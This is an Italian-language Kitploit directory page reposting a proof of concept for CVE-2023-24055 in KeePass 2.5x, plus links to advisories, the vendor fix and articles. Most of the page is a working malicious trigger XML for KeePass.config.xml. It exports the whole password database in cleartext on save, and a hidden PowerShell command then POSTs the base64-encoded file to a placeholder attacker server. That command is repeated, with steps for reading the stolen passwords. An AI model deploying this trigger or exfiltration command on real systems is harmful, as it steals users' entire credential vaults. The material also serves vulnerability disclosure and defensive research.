Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-24055_PoC — CVE-2023-24055 PoC (KeePass 2.5x) | Kitploit
Strumenti/GitHubGitHub/alt3kx/cve-2023-24055_poc
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitEsfiltrazione DatiPost-ExploitRed Teaming
GitHubalt3kx/cve-2023-24055_poc

CVE-2023-24055_PoC

CVE-2023-24055 PoC (KeePass 2.5x)

Vedi Repository
25337473 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2023-24055 PoC (KeePass 2.5x)

In discussione e in fase di analisi...

https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
https://sourceforge.net/p/keepass/feature-requests/2773/

Un attaccante che ha accesso in scrittura al file di configurazione di KeePass può modificarlo e iniettare trigger maliziosi, ad esempio per ottenere le password in chiaro aggiungendo un trigger di esportazione.

https://nvd.nist.gov/vuln/detail/CVE-2023-24055
https://www.cve.org/CVERecord?id=CVE-2023-24055

Il mio primo PoC (KeePass 2.5x)

(1) Un attaccante che ha accesso in scrittura al file di configurazione di KeePass KeePass.config.xml potrebbe iniettare il seguente trigger, ad esempio:

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<TriggerCollection xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<Triggers>
		<Trigger>
			<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
			<Name>exploit</Name>
			<Events>
				<Event>
					<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
					<Parameters>
						<Parameter>0</Parameter>
						<Parameter />
					</Parameters>
				</Event>
			</Events>
			<Conditions />
			<Actions>
				<Action>
					<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
					<Parameters>
						<Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter>
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter />
						<Parameter />
					</Parameters>
				</Action>
				<Action>
					<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
					<Parameters>
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>
						<Parameter>False</Parameter>
						<Parameter>1</Parameter>
						<Parameter />
					</Parameters>
				</Action>
			</Actions>
		</Trigger>
	</Triggers>
</TriggerCollection>

(2) La vittima aprirà KeePass come di consueto, salvando le modifiche, ecc. Il trigger verrà eseguito in background, esfiltrando le credenziali verso il server dell'attaccante.

Dettagli del PoC del trigger

a) Il trigger esporterà il database di KeePass in formato KeePass XML (2.x) includendo tutte le credenziali (in chiaro) nel seguente percorso, ad esempio:

root@kitploit:~
c:\Users\John\AppData\Local\Temp\exploit.xml 

b) Una volta esportato il file, potrebbe essere definita una seconda azione per esfiltrare i dati XML utilizzando Powershell.exe e codificati in base64, ad esempio:

root@kitploit:~
PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))

c) I dati verranno esfiltrati al web server dell'attaccante, ad esempio:

1

Valori del PoC del trigger

root@kitploit:~
Name: Trigger
Events: Saved database file | [Equals]
Conditions: <empty>
Actions: 

(1) Export active database 
File/URL: c:\Users\John\AppData\Local\Temp\exploit.xml
File/Format:  KeePass XML (2.x)

(2) Execute command line / URL
File/URL: PowerShell.exe
Arguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))
Window style: Hidden

Credenziali...

root@kitploit:~
PS C:\Users\John\AppData\Local\Temp> type .\exploit.xml  | Select-String -Pattern Password

2

3

Esempi pubblici di trigger:

https://keepass.info/help/kb/trigger_examples.html

Fix rilasciato: Modifiche dalla versione 2.53 alla 2.53.1:

https://keepass.info/news/n230109_2.53.html

root@kitploit:~
Removed the 'Export - No Key Repeat' application policy flag; KeePass now always asks for the current master key when trying to export data.

Ulteriori letture

(*) Cosa significa questo CVE di KeePass per le organizzazioni alla ricerca di nuovi vault di password (Carlos Perez)

https://www.trustedsec.com/blog/what-this-keepass-cve-means-for-organizations-searching-for-new-password-vaults/
https://www.youtube.com/watch?v=OEaFaSjaZY4

(*) KeePass contesta la segnalazione di una falla che potrebbe esfiltrare un database (Steve Zurier)

https://www.scmagazine.com/analysis/identity-and-access/keepass-disputes-report-of-flaw-that-could-exfiltrate-a-database

(*) Security Weekly News (06:56 KeePass)

https://www.youtube.com/watch?v=iz0PsYlH8Ig

(*) KeePass 2.53.1, una nuova versione che corregge « la vulnerabilità » CVE-2023-24055 (IT Connect FR)

https://www.it-connect.fr/keepass-2-53-1-une-nouvelle-version-qui-corrige-la-vulnerabilite/
https://www.it-connect.fr/faille-critique-dans-keepass-un-attaquant-peut-exporter-les-mots-de-passe-en-clair/

(*) Strumenti

https://github.com/deetl/CVE-2023-24055
https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
https://github.com/Orange-Cyberdefense/KeePwn

Autore

Alex Hernandez aka (@_alt3kx_)

Scarica lo strumento